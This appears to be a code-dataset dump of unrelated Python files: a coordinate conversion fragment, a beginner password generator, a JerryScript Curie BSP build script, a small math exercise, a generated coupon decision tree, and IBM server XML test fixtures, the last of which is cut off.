"""convert latitude longitude radius to x y z cartesian coordinates
xyz is a numpy array, a right handed co-ordinate system is assumed with
-- x-axis going through the equator at 0 degrees longitude
-- y-axis going through the equator at 90 degrees longitude
-- z-axis going through the north pole."""
x = r * np.cos(lon) * np.cos(lat)
y = r * np.sin(lon) * np.cos(lat)
z = r * np.sin(lat)
return x, y, z
# def xyzToLatLonR(xyz):
# trans = np.array([np.])
| [((196, 8, 196, 35), 'numpy.sqrt', 'np.sqrt', ({(196, 16, 196, 34): 'x ** 2 + y ** 2 + z ** 2'}, {}), '(x ** 2 + y ** 2 + z ** 2)', True, 'import numpy as np\n'), ((138, 14, 138, 26), 'matplotlib.pyplot.figure', 'plt.figure', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((140, 14, 140, 58), 'numpy.asarray', 'np.asarray', ({(140, 25, 140, 57): '[pt.xyz for pt in self.points]'}, {}), '([pt.xyz for pt in self.points])', True, 'import numpy as np\n'), ((144, 13, 144, 77), 'numpy.asarray', 'np.asarray', ({(144, 24, 144, 76): '[[p.idx for p in t.pts] for t in self.triangles]'}, {}), '([[p.idx for p in t.pts] for t in self.triangles])', True, 'import numpy as np\n'), ((146, 8, 146, 18), 'matplotlib.pyplot.show', 'plt.show', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((197, 21, 197, 36), 'numpy.arctan2', 'np.arctan2', ({(197, 32, 197, 33): 'y', (197, 34, 197, 35): 'x'}, {}), '(y, x)', True, 'import numpy as np\n'), ((198, 21, 198, 35), 'numpy.arcsin', 'np.arcsin', ({(198, 31, 198, 34): 'z / r'}, {}), '(z / r)', True, 'import numpy as np\n'), ((207, 26, 207, 37), 'numpy.cos', 'np.cos', ({(207, 33, 207, 36): 'lat'}, {}), '(lat)', True, 'import numpy as np\n'), ((208, 26, 208, 37), 'numpy.cos', 'np.cos', ({(208, 33, 208, 36): 'lat'}, {}), '(lat)', True, 'import numpy as np\n'), ((209, 12, 209, 23), 'numpy.sin', 'np.sin', ({(209, 19, 209, 22): 'lat'}, {}), '(lat)', True, 'import numpy as np\n'), ((43, 23, 43, 43), 'numpy.array', 'np.array', ({(43, 32, 43, 42): '[-1, t, 0]'}, {}), '([-1, t, 0])', True, 'import numpy as np\n'), ((44, 23, 44, 43), 'numpy.array', 'np.array', ({(44, 32, 44, 42): '[1, t, 0]'}, {}), '([1, t, 0])', True, 'import numpy as np\n'), ((45, 23, 45, 43), 'numpy.array', 'np.array', ({(45, 32, 45, 42): '[-1, -t, 0]'}, {}), '([-1, -t, 0])', True, 'import numpy as np\n'), ((46, 23, 46, 43), 'numpy.array', 'np.array', ({(46, 32, 46, 42): '[1, -t, 0]'}, {}), '([1, -t, 0])', True, 'import numpy as np\n'), ((47, 23, 47, 43), 'numpy.array', 'np.array', ({(47, 32, 47, 42): '[0, -1, t]'}, {}), '([0, -1, t])', True, 'import numpy as np\n'), ((48, 23, 48, 43), 'numpy.array', 'np.array', ({(48, 32, 48, 42): '[0, 1, t]'}, {}), '([0, 1, t])', True, 'import numpy as np\n'), ((49, 23, 49, 43), 'numpy.array', 'np.array', ({(49, 32, 49, 42): '[0, -1, -t]'}, {}), '([0, -1, -t])', True, 'import numpy as np\n'), ((50, 23, 50, 43), 'numpy.array', 'np.array', ({(50, 32, 50, 42): '[0, 1, -t]'}, {}), '([0, 1, -t])', True, 'import numpy as np\n'), ((51, 23, 51, 43), 'numpy.array', 'np.array', ({(51, 32, 51, 42): '[t, 0, -1]'}, {}), '([t, 0, -1])', True, 'import numpy as np\n'), ((52, 23, 52, 43), 'numpy.array', 'np.array', ({(52, 32, 52, 42): '[t, 0, 1]'}, {}), '([t, 0, 1])', True, 'import numpy as np\n'), ((53, 23, 53, 43), 'numpy.array', 'np.array', ({(53, 32, 53, 42): '[-t, 0, -1]'}, {}), '([-t, 0, -1])', True, 'import numpy as np\n'), ((54, 23, 54, 43), 'numpy.array', 'np.array', ({(54, 32, 54, 42): '[-t, 0, 1]'}, {}), '([-t, 0, 1])', True, 'import numpy as np\n'), ((207, 12, 207, 23), 'numpy.cos', 'np.cos', ({(207, 19, 207, 22): 'lon'}, {}), '(lon)', True, 'import numpy as np\n'), ((208, 12, 208, 23), 'numpy.sin', 'np.sin', ({(208, 19, 208, 22): 'lon'}, {}), '(lon)', True, 'import numpy as np\n'), ((40, 19, 40, 31), 'numpy.sqrt', 'np.sqrt', ({(40, 27, 40, 30): '(5.0)'}, {}), '(5.0)', True, 'import numpy as np\n'), ((178, 28, 178, 47), 'numpy.linalg.norm', 'np.linalg.norm', ({(178, 43, 178, 46): 'xyz'}, {}), '(xyz)', True, 'import numpy as np\n')] |
Lidenbrock-ed/challenge-prework-backend-python | src/main.py | d2f46a5cf9ad649de90d4194d115cd9492eb583d | # Resolve the problem!!
import string
import random
SYMBOLS = list('!"#$%&\'()*+,-./:;?@[]^_`{|}~')
def generate_password():
# Start coding here
letters_min = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','x','y','z']
letters_may = ['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','X','Y','Z']
numbers = ['1','2', '3','4','5','6','7','8','9','0']
safe_password = letters_min + letters_may + numbers + SYMBOLS
final_password = []
for i in range(15):
generate_caracter = random.choice(safe_password)
final_password.append(generate_caracter)
final_password = "".join(final_password)
print(final_password)
return final_password
def validate(password):
if len(password) >= 8 and len(password) <= 16:
has_lowercase_letters = False
has_numbers = False
has_uppercase_letters = False
has_symbols = False
for char in password:
if char in string.ascii_lowercase:
has_lowercase_letters = True
break
for char in password:
if char in string.ascii_uppercase:
has_uppercase_letters = True
break
for char in password:
if char in string.digits:
has_numbers = True
break
for char in password:
if char in SYMBOLS:
has_symbols = True
break
if has_symbols and has_numbers and has_lowercase_letters and has_uppercase_letters:
return True
return False
def run():
password = generate_password()
if validate(password):
print('Secure Password')
else:
print('Insecure Password')
if __name__ == '__main__':
run()
| [((17, 28, 17, 56), 'random.choice', 'random.choice', ({(17, 42, 17, 55): 'safe_password'}, {}), '(safe_password)', False, 'import random\n')] |
ideas-detoxes/jerryscript | targets/baremetal-sdk/curie-bsp/setup.py | 42523bd6e2b114755498c9f68fd78545f9b33476 | #!/usr/bin/env python
# Copyright JS Foundation and other contributors, http://js.foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import fnmatch
import os
def build_soft_links(project_path, jerry_path):
""" Creates soft links into the @project_path. """
if not os.path.exists(project_path):
os.makedirs(project_path)
links = [
{ # arc
'src': os.path.join('targets', 'baremetal-sdk', 'curie-bsp', 'jerry_app', 'arc'),
'link_name': 'arc'
},
{ # include
'src': os.path.join('targets', 'baremetal-sdk', 'curie-bsp', 'jerry_app', 'include'),
'link_name': 'include'
},
{ # quark
'src': os.path.join('targets', 'baremetal-sdk', 'curie-bsp', 'jerry_app', 'quark'),
'link_name': 'quark'
},
{ # quark/jerryscript
'src': jerry_path,
'link_name': os.path.join('quark', 'jerryscript')
}
]
for link in links:
src = os.path.join(jerry_path, link['src'])
link_name = os.path.join(project_path, link['link_name'])
if not os.path.islink(link_name):
os.symlink(src, link_name)
print("Created symlink '{link_name}' -> '{src}'".format(src=src, link_name=link_name))
def find_sources(root_dir, sub_dir):
"""
Find .c and .S files inside the @root_dir/@sub_dir directory.
Note: the returned paths will be relative to the @root_dir directory.
"""
src_dir = os.path.join(root_dir, sub_dir)
matches = []
for root, dirnames, filenames in os.walk(src_dir):
for filename in fnmatch.filter(filenames, '*.[c|S]'):
file_path = os.path.join(root, filename)
relative_path = os.path.relpath(file_path, root_dir)
matches.append(relative_path)
return matches
def build_jerry_data(jerry_path):
"""
Build up a dictionary which contains the following items:
- sources: list of JerryScript sources which should be built.
- dirs: list of JerryScript dirs used.
- cflags: CFLAGS for the build.
"""
jerry_sources = []
jerry_dirs = set()
for sub_dir in ['jerry-core', 'jerry-math', os.path.join('targets', 'baremetal-sdk', 'curie-bsp', 'source')]:
for file in find_sources(os.path.normpath(jerry_path), sub_dir):
path = os.path.join('jerryscript', file)
jerry_sources.append(path)
jerry_dirs.add(os.path.split(path)[0])
jerry_cflags = [
'-DJERRY_GLOBAL_HEAP_SIZE=10',
'-DJERRY_NDEBUG',
'-DJERRY_DISABLE_HEAVY_DEBUG',
'-DJERRY_BUILTIN_NUMBER=0',
'-DJERRY_BUILTIN_STRING=0',
'-DJERRY_BUILTIN_BOOLEAN=0',
#'-DJERRY_BUILTIN_ERRORS=0',
'-DJERRY_BUILTIN_ARRAY=0',
'-DJERRY_BUILTIN_MATH=0',
'-DJERRY_BUILTIN_JSON=0',
'-DJERRY_BUILTIN_DATE=0',
'-DJERRY_BUILTIN_REGEXP=0',
'-DJERRY_BUILTIN_ANNEXB=0',
'-DJERRY_ESNEXT=0',
'-DJERRY_LCACHE=0',
'-DJERRY_PROPERTY_HASHMAP=0',
]
return {
'sources': jerry_sources,
'dirs': jerry_dirs,
'cflags': jerry_cflags,
}
def write_file(path, content):
""" Writes @content into the file at specified by the @path. """
norm_path = os.path.normpath(path)
with open(norm_path, "w+") as f:
f.write(content)
print("Wrote file '{0}'".format(norm_path))
def build_obj_y(source_list):
"""
Build obj-y additions from the @source_list.
Note: the input sources should have their file extensions.
"""
return '\n'.join(['obj-y += {0}.o'.format(os.path.splitext(fname)[0]) for fname in source_list])
def build_cflags_y(cflags_list):
"""
Build cflags-y additions from the @cflags_list.
Note: the input sources should have their file extensions.
"""
return '\n'.join(['cflags-y += {0}'.format(cflag) for cflag in cflags_list])
def build_mkdir(dir_list):
""" Build mkdir calls for each dir in the @dir_list. """
return '\n'.join(['\t$(AT)mkdir -p {0}'.format(os.path.join('$(OUT_SRC)', path)) for path in dir_list])
def create_root_kbuild(project_path):
""" Creates @project_path/Kbuild.mk file. """
root_kbuild_path = os.path.join(project_path, 'Kbuild.mk')
root_kbuild_content = '''
obj-$(CONFIG_QUARK_SE_ARC) += arc/
obj-$(CONFIG_QUARK_SE_QUARK) += quark/
'''
write_file(root_kbuild_path, root_kbuild_content)
def create_root_makefile(project_path):
""" Creates @project_path/Makefile file. """
root_makefile_path = os.path.join(project_path, 'Makefile')
root_makefile_content = '''
THIS_DIR := $(shell dirname $(abspath $(lastword $(MAKEFILE_LIST))))
T := $(abspath $(THIS_DIR)/../..)
PROJECT := {project_name}
BOARD := curie_101
ifeq ($(filter curie_101, $(BOARD)),)
$(error The curie jerry sample application can only run on the curie_101 Board)
endif
BUILDVARIANT ?= debug
quark_DEFCONFIG = $(PROJECT_PATH)/quark/defconfig
arc_DEFCONFIG = $(PROJECT_PATH)/arc/defconfig
# Optional: set the default version
VERSION_MAJOR := 1
VERSION_MINOR := 0
VERSION_PATCH := 0
include $(T)/build/project.mk
'''.format(project_name=project_name)
write_file(root_makefile_path, root_makefile_content)
def create_arc_kbuild(project_path):
""" Creates @project_path/arc/Kbuild.mk file. """
arc_path = os.path.join(project_path, 'arc')
arc_kbuild_path = os.path.join(arc_path, 'Kbuild.mk')
arc_sources = find_sources(arc_path, '.')
arc_kbuild_content = build_obj_y(arc_sources)
write_file(arc_kbuild_path, arc_kbuild_content)
def create_quark_kbuild(project_path, jerry_path):
""" Creates @project_path/quark/Kbuild.mk file. """
quark_kbuild_path = os.path.join(project_path, 'quark', 'Kbuild.mk')
# Extract a few JerryScript related data
jerry_data = build_jerry_data(jerry_path)
jerry_objects = build_obj_y(jerry_data['sources'])
jerry_defines = jerry_data['cflags']
jerry_build_dirs = build_mkdir(jerry_data['dirs'])
quark_include_paths = [
'include',
'jerryscript',
os.path.join('jerryscript', 'jerry-math', 'include'),
os.path.join('jerryscript', 'targets', 'baremetal-sdk', 'curie-bsp', 'include')
] + list(jerry_data['dirs'])
quark_includes = [
'-Wno-error',
] + ['-I%s' % os.path.join(project_path, 'quark', path) for path in quark_include_paths]
quark_cflags = build_cflags_y(jerry_defines + quark_includes)
quark_kbuild_content = '''
{cflags}
obj-y += main.o
{objects}
build_dirs:
{dirs}
$(OUT_SRC): build_dirs
'''.format(objects=jerry_objects, cflags=quark_cflags, dirs=jerry_build_dirs)
write_file(quark_kbuild_path, quark_kbuild_content)
def main(curie_path, project_name, jerry_path):
project_path = os.path.join(curie_path, 'wearable_device_sw', 'projects', project_name)
build_soft_links(project_path, jerry_path)
create_root_kbuild(project_path)
create_root_makefile(project_path)
create_arc_kbuild(project_path)
create_quark_kbuild(project_path, jerry_path)
if __name__ == '__main__':
import sys
if len(sys.argv) != 2:
print('Usage:')
print('{script_name} [full or relative path of Curie_BSP]'.format(script_name=sys.argv[0]))
sys.exit(1)
project_name = 'curie_bsp_jerry'
file_dir = os.path.dirname(os.path.abspath(__file__))
jerry_path = os.path.join(file_dir, "..", "..", "..")
curie_path = os.path.join(os.getcwd(), sys.argv[1])
main(curie_path, project_name, jerry_path)
| [((58, 14, 58, 45), 'os.path.join', 'os.path.join', ({(58, 27, 58, 35): 'root_dir', (58, 37, 58, 44): 'sub_dir'}, {}), '(root_dir, sub_dir)', False, 'import os\n'), ((61, 37, 61, 53), 'os.walk', 'os.walk', ({(61, 45, 61, 52): 'src_dir'}, {}), '(src_dir)', False, 'import os\n'), ((113, 16, 113, 38), 'os.path.normpath', 'os.path.normpath', ({(113, 33, 113, 37): 'path'}, {}), '(path)', False, 'import os\n'), ((143, 23, 143, 62), 'os.path.join', 'os.path.join', ({(143, 36, 143, 48): 'project_path', (143, 50, 143, 61): '"""Kbuild.mk"""'}, {}), "(project_path, 'Kbuild.mk')", False, 'import os\n'), ((154, 25, 154, 63), 'os.path.join', 'os.path.join', ({(154, 38, 154, 50): 'project_path', (154, 52, 154, 62): '"""Makefile"""'}, {}), "(project_path, 'Makefile')", False, 'import os\n'), ((180, 15, 180, 48), 'os.path.join', 'os.path.join', ({(180, 28, 180, 40): 'project_path', (180, 42, 180, 47): '"""arc"""'}, {}), "(project_path, 'arc')", False, 'import os\n'), ((181, 22, 181, 57), 'os.path.join', 'os.path.join', ({(181, 35, 181, 43): 'arc_path', (181, 45, 181, 56): '"""Kbuild.mk"""'}, {}), "(arc_path, 'Kbuild.mk')", False, 'import os\n'), ((190, 24, 190, 72), 'os.path.join', 'os.path.join', ({(190, 37, 190, 49): 'project_path', (190, 51, 190, 58): '"""quark"""', (190, 60, 190, 71): '"""Kbuild.mk"""'}, {}), "(project_path, 'quark', 'Kbuild.mk')", False, 'import os\n'), ((227, 19, 227, 91), 'os.path.join', 'os.path.join', ({(227, 32, 227, 42): 'curie_path', (227, 44, 227, 64): '"""wearable_device_sw"""', (227, 66, 227, 76): '"""projects"""', (227, 78, 227, 90): 'project_name'}, {}), "(curie_path, 'wearable_device_sw', 'projects', project_name)", False, 'import os\n'), ((248, 17, 248, 57), 'os.path.join', 'os.path.join', ({(248, 30, 248, 38): 'file_dir', (248, 40, 248, 44): '""".."""', (248, 46, 248, 50): '""".."""', (248, 52, 248, 56): '""".."""'}, {}), "(file_dir, '..', '..', '..')", False, 'import os\n'), ((23, 11, 23, 39), 'os.path.exists', 'os.path.exists', ({(23, 26, 23, 38): 'project_path'}, {}), '(project_path)', False, 'import os\n'), ((24, 8, 24, 33), 'os.makedirs', 'os.makedirs', ({(24, 20, 24, 32): 'project_path'}, {}), '(project_path)', False, 'import os\n'), ((46, 14, 46, 51), 'os.path.join', 'os.path.join', ({(46, 27, 46, 37): 'jerry_path', (46, 39, 46, 50): "link['src']"}, {}), "(jerry_path, link['src'])", False, 'import os\n'), ((47, 20, 47, 65), 'os.path.join', 'os.path.join', ({(47, 33, 47, 45): 'project_path', (47, 47, 47, 64): "link['link_name']"}, {}), "(project_path, link['link_name'])", False, 'import os\n'), ((62, 24, 62, 60), 'fnmatch.filter', 'fnmatch.filter', ({(62, 39, 62, 48): 'filenames', (62, 50, 62, 59): '"""*.[c|S]"""'}, {}), "(filenames, '*.[c|S]')", False, 'import fnmatch\n'), ((79, 48, 79, 111), 'os.path.join', 'os.path.join', ({(79, 61, 79, 70): '"""targets"""', (79, 72, 79, 87): '"""baremetal-sdk"""', (79, 89, 79, 100): '"""curie-bsp"""', (79, 102, 79, 110): '"""source"""'}, {}), "('targets', 'baremetal-sdk', 'curie-bsp', 'source')", False, 'import os\n'), ((243, 8, 243, 19), 'sys.exit', 'sys.exit', ({(243, 17, 243, 18): '(1)'}, {}), '(1)', False, 'import sys\n'), ((247, 31, 247, 56), 'os.path.abspath', 'os.path.abspath', ({(247, 47, 247, 55): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((249, 30, 249, 41), 'os.getcwd', 'os.getcwd', ({}, {}), '()', False, 'import os\n'), ((28, 19, 28, 92), 'os.path.join', 'os.path.join', ({(28, 32, 28, 41): '"""targets"""', (28, 43, 28, 58): '"""baremetal-sdk"""', (28, 60, 28, 71): '"""curie-bsp"""', (28, 73, 28, 84): '"""jerry_app"""', (28, 86, 28, 91): '"""arc"""'}, {}), "('targets', 'baremetal-sdk', 'curie-bsp', 'jerry_app', 'arc')", False, 'import os\n'), ((32, 19, 32, 96), 'os.path.join', 'os.path.join', ({(32, 32, 32, 41): '"""targets"""', (32, 43, 32, 58): '"""baremetal-sdk"""', (32, 60, 32, 71): '"""curie-bsp"""', (32, 73, 32, 84): '"""jerry_app"""', (32, 86, 32, 95): '"""include"""'}, {}), "('targets', 'baremetal-sdk', 'curie-bsp', 'jerry_app', 'include')", False, 'import os\n'), ((36, 19, 36, 94), 'os.path.join', 'os.path.join', ({(36, 32, 36, 41): '"""targets"""', (36, 43, 36, 58): '"""baremetal-sdk"""', (36, 60, 36, 71): '"""curie-bsp"""', (36, 73, 36, 84): '"""jerry_app"""', (36, 86, 36, 93): '"""quark"""'}, {}), "('targets', 'baremetal-sdk', 'curie-bsp', 'jerry_app', 'quark')", False, 'import os\n'), ((41, 25, 41, 61), 'os.path.join', 'os.path.join', ({(41, 38, 41, 45): '"""quark"""', (41, 47, 41, 60): '"""jerryscript"""'}, {}), "('quark', 'jerryscript')", False, 'import os\n'), ((48, 15, 48, 40), 'os.path.islink', 'os.path.islink', ({(48, 30, 48, 39): 'link_name'}, {}), '(link_name)', False, 'import os\n'), ((49, 12, 49, 38), 'os.symlink', 'os.symlink', ({(49, 23, 49, 26): 'src', (49, 28, 49, 37): 'link_name'}, {}), '(src, link_name)', False, 'import os\n'), ((63, 24, 63, 52), 'os.path.join', 'os.path.join', ({(63, 37, 63, 41): 'root', (63, 43, 63, 51): 'filename'}, {}), '(root, filename)', False, 'import os\n'), ((64, 28, 64, 64), 'os.path.relpath', 'os.path.relpath', ({(64, 44, 64, 53): 'file_path', (64, 55, 64, 63): 'root_dir'}, {}), '(file_path, root_dir)', False, 'import os\n'), ((80, 33, 80, 61), 'os.path.normpath', 'os.path.normpath', ({(80, 50, 80, 60): 'jerry_path'}, {}), '(jerry_path)', False, 'import os\n'), ((81, 19, 81, 52), 'os.path.join', 'os.path.join', ({(81, 32, 81, 45): '"""jerryscript"""', (81, 47, 81, 51): 'file'}, {}), "('jerryscript', file)", False, 'import os\n'), ((201, 8, 201, 60), 'os.path.join', 'os.path.join', ({(201, 21, 201, 34): '"""jerryscript"""', (201, 36, 201, 48): '"""jerry-math"""', (201, 50, 201, 59): '"""include"""'}, {}), "('jerryscript', 'jerry-math', 'include')", False, 'import os\n'), ((202, 8, 202, 87), 'os.path.join', 'os.path.join', ({(202, 21, 202, 34): '"""jerryscript"""', (202, 36, 202, 45): '"""targets"""', (202, 47, 202, 62): '"""baremetal-sdk"""', (202, 64, 202, 75): '"""curie-bsp"""', (202, 77, 202, 86): '"""include"""'}, {}), "('jerryscript', 'targets', 'baremetal-sdk', 'curie-bsp', 'include')", False, 'import os\n'), ((137, 51, 137, 83), 'os.path.join', 'os.path.join', ({(137, 64, 137, 76): '"""$(OUT_SRC)"""', (137, 78, 137, 82): 'path'}, {}), "('$(OUT_SRC)', path)", False, 'import os\n'), ((207, 18, 207, 59), 'os.path.join', 'os.path.join', ({(207, 31, 207, 43): 'project_path', (207, 45, 207, 52): '"""quark"""', (207, 54, 207, 58): 'path'}, {}), "(project_path, 'quark', path)", False, 'import os\n'), ((83, 27, 83, 46), 'os.path.split', 'os.path.split', ({(83, 41, 83, 45): 'path'}, {}), '(path)', False, 'import os\n'), ((124, 46, 124, 69), 'os.path.splitext', 'os.path.splitext', ({(124, 63, 124, 68): 'fname'}, {}), '(fname)', False, 'import os\n')] |
genisyskernel/cursoemvideo-python | pythonteste/aula08a.py | dec301e33933388c886fe78010f38adfb24dae82 | from math import sqrt
import emoji
num = int(input("Digite um número: "))
raiz = sqrt(num)
print("A raiz do número {0} é {1:.2f}.".format(num, raiz))
print(emoji.emojize("Hello World! :earth_americas:", use_aliases=True))
| [((4, 7, 4, 16), 'math.sqrt', 'sqrt', ({(4, 12, 4, 15): 'num'}, {}), '(num)', False, 'from math import sqrt\n'), ((6, 6, 6, 70), 'emoji.emojize', 'emoji.emojize', (), '', False, 'import emoji\n')] |
apcarrik/kaggle | duke-cs671-fall21-coupon-recommendation/outputs/rules/RF/17_features/numtrees_30/rule_20.py | 6e2d4db58017323e7ba5510bcc2598e01a4ee7bf | def findDecision(obj): #obj[0]: Passanger, obj[1]: Weather, obj[2]: Time, obj[3]: Coupon, obj[4]: Coupon_validity, obj[5]: Gender, obj[6]: Age, obj[7]: Maritalstatus, obj[8]: Children, obj[9]: Education, obj[10]: Occupation, obj[11]: Income, obj[12]: Bar, obj[13]: Coffeehouse, obj[14]: Restaurant20to50, obj[15]: Direction_same, obj[16]: Distance
# {"feature": "Maritalstatus", "instances": 34, "metric_value": 0.99, "depth": 1}
if obj[7]>0:
# {"feature": "Age", "instances": 25, "metric_value": 0.9896, "depth": 2}
if obj[6]<=5:
# {"feature": "Time", "instances": 21, "metric_value": 0.9984, "depth": 3}
if obj[2]<=1:
# {"feature": "Occupation", "instances": 13, "metric_value": 0.8905, "depth": 4}
if obj[10]<=13:
# {"feature": "Coupon", "instances": 11, "metric_value": 0.684, "depth": 5}
if obj[3]>0:
# {"feature": "Distance", "instances": 10, "metric_value": 0.469, "depth": 6}
if obj[16]<=2:
return 'False'
elif obj[16]>2:
# {"feature": "Coupon_validity", "instances": 2, "metric_value": 1.0, "depth": 7}
if obj[4]<=0:
return 'True'
elif obj[4]>0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[3]<=0:
return 'True'
else: return 'True'
elif obj[10]>13:
return 'True'
else: return 'True'
elif obj[2]>1:
# {"feature": "Occupation", "instances": 8, "metric_value": 0.8113, "depth": 4}
if obj[10]<=7:
return 'True'
elif obj[10]>7:
# {"feature": "Weather", "instances": 3, "metric_value": 0.9183, "depth": 5}
if obj[1]<=0:
return 'False'
elif obj[1]>0:
return 'True'
else: return 'True'
else: return 'False'
else: return 'True'
elif obj[6]>5:
return 'True'
else: return 'True'
elif obj[7]<=0:
# {"feature": "Age", "instances": 9, "metric_value": 0.5033, "depth": 2}
if obj[6]>0:
return 'False'
elif obj[6]<=0:
return 'True'
else: return 'True'
else: return 'False'
| [] |
quamilek/ralph | src/ralph/discovery/tests/plugins/samples/http_ibm_system_x.py | bf7231ea096924332b874718b33cd1f43f9c783b | macs_response = '''<?xml version="1.0"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wxf="http://schemas.xmlsoap.org/ws/2004/09/transfer"><s:Header><wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To><wsa:Action>http://www.ibm.com/iBMC/sp/Monitors/GetHostMacAddressesResponse</wsa:Action><wsa:RelatesTo>dt:1348742659504</wsa:RelatesTo><wsa:From><wsa:Address>http://10.10.10.10/wsman</wsa:Address></wsa:From><wsa:MessageID>uuid:111efb9a-f7d8-4977-8472-bcad40212a71</wsa:MessageID></s:Header><s:Body><GetHostMacAddressesResponse><HostMACaddress><HostMaddr><Description>Host Ethernet MAC Address 1</Description><Address>6E:F3:DD:E5:96:40</Address></HostMaddr><HostMaddr><Description>Host Ethernet MAC Address 2</Description><Address>6E:F3:DD:E5:96:42</Address></HostMaddr></HostMACaddress></GetHostMacAddressesResponse></s:Body></s:Envelope>
'''
memory_response = '''<?xml version="1.0"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wxf="http://schemas.xmlsoap.org/ws/2004/09/transfer"><s:Header><wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To><wsa:Action>http://www.ibm.com/iBMC/sp/Monitors/GetMemoryInfoResponse</wsa:Action><wsa:RelatesTo>dt:1348742659500</wsa:RelatesTo><wsa:From><wsa:Address>http://10.10.10.10/wsman</wsa:Address></wsa:From><wsa:MessageID>uuid:dc560696-2ba4-4917-b7e7-1aac1983b727</wsa:MessageID></s:Header><s:Body><GetMemoryInfoResponse><Memory><MemoryInfo><Description>DIMM 2</Description><PartNumber>HMT351R7BFR4A-H9</PartNumber><SerialNumber>33b8a62f</SerialNumber><ManufactureDate>4511</ManufactureDate><Type>DDR3</Type><Size>4</Size></MemoryInfo><MemoryInfo><Description>DIMM 3</Description><PartNumber>M393B1K70CH0-YH9</PartNumber><SerialNumber>b38aa385</SerialNumber><ManufactureDate>2211</ManufactureDate><Type>DDR3</Type><Size>8</Size></MemoryInfo><MemoryInfo><Description>DIMM 6</Description><PartNumber>M393B1K70CH0-YH9</PartNumber><SerialNumber>a78aa385</SerialNumber><ManufactureDate>2211</ManufactureDate><Type>DDR3</Type><Size>8</Size></MemoryInfo><MemoryInfo><Description>DIMM 9</Description><PartNumber>EBJ40RF4ECFA-DJ-F</PartNumber><SerialNumber>b524042b</SerialNumber><ManufactureDate>4711</ManufactureDate><Type>DDR3</Type><Size>4</Size></MemoryInfo><MemoryInfo><Description>DIMM 11</Description><PartNumber>EBJ40RF4ECFA-DJ-F</PartNumber><SerialNumber>ba24042b</SerialNumber><ManufactureDate>4711</ManufactureDate><Type>DDR3</Type><Size>4</Size></MemoryInfo><MemoryInfo><Description>DIMM 12</Description><PartNumber>M393B1K70CH0-YH9</PartNumber><SerialNumber>8e8aa385</SerialNumber><ManufactureDate>2211</ManufactureDate><Type>DDR3</Type><Size>8</Size></MemoryInfo><MemoryInfo><Description>DIMM 15</Description><PartNumber>M393B1K70CH0-YH9</PartNumber><SerialNumber>7feda482</SerialNumber><ManufactureDate>2211</ManufactureDate><Type>DDR3</Type><Size>8</Size></MemoryInfo><MemoryInfo><Description>DIMM 18</Description><PartNumber>EBJ40RF4ECFA-DJ-F</PartNumber><SerialNumber>d924042b</SerialNumber><ManufactureDate>4711</ManufactureDate><Type>DDR3</Type><Size>4</Size></MemoryInfo></Memory></GetMemoryInfoResponse></s:Body></s:Envelope>
'''
generic_data_response = '''<?xml version="1.0"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wxf="http://schemas.xmlsoap.org/ws/2004/09/transfer"><s:Header><wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To><wsa:Action>http://www.ibm.com/iBMC/sp/Monitors/GetVitalProductDataResponse</wsa:Action><wsa:RelatesTo>dt:1348742659499</wsa:RelatesTo><wsa:From><wsa:Address>http://10.10.10.10/wsman</wsa:Address></wsa:From><wsa:MessageID>uuid:e6829941-2510-4b3d-b9f3-61c7be372dfd</wsa:MessageID></s:Header><s:Body><GetVitalProductDataResponse><GetVitalProductDataResponse><MachineLevelVPD><ProductName>System x3550 M3</ProductName><MachineTypeAndModel>794452G</MachineTypeAndModel><SerialNumber>KD55ARA</SerialNumber><UUID>99A4E4A303023961B8E1561E33328996</UUID></MachineLevelVPD><ComponentLevelVPD><FRUNumber>59Y3915</FRUNumber><FRUName>DASD Backplane 1</FRUName><SerialNumber>Y010RW1AR1Y0</SerialNumber><MfgID>USIS</MfgID></ComponentLevelVPD><ComponentLevelVPD><FRUNumber>39Y7229</FRUNumber><FRUName>Power Supply 1</FRUName><SerialNumber>K1411183222</SerialNumber><MfgID>ACBE</MfgID></ComponentLevelVPD><ComponentLevelVPD><FRUNumber>39Y7229</FRUNumber><FRUName>Power Supply 2</FRUName><SerialNumber>K141115Y2BK</SerialNumber><MfgID>ACBE</MfgID></ComponentLevelVPD><ComponentActivityLog><FRUNumber>39Y7229</FRUNumber><FRUName>Power Supply 1</FRUName><SerialNumber>K1411183222</SerialNumber><MfgID>ACBE</MfgID><Action>Added</Action><TimeStamp>11/25/2011:13:53:13</TimeStamp></ComponentActivityLog><ComponentActivityLog><FRUNumber>59Y3915</FRUNumber><FRUName>DASD Backplane 1</FRUName><SerialNumber>Y010RW1AR1Y0</SerialNumber><MfgID>USIS</MfgID><Action>Added</Action><TimeStamp>11/25/2011:13:53:13</TimeStamp></ComponentActivityLog><ComponentActivityLog><FRUNumber>39Y7229</FRUNumber><FRUName>Power Supply 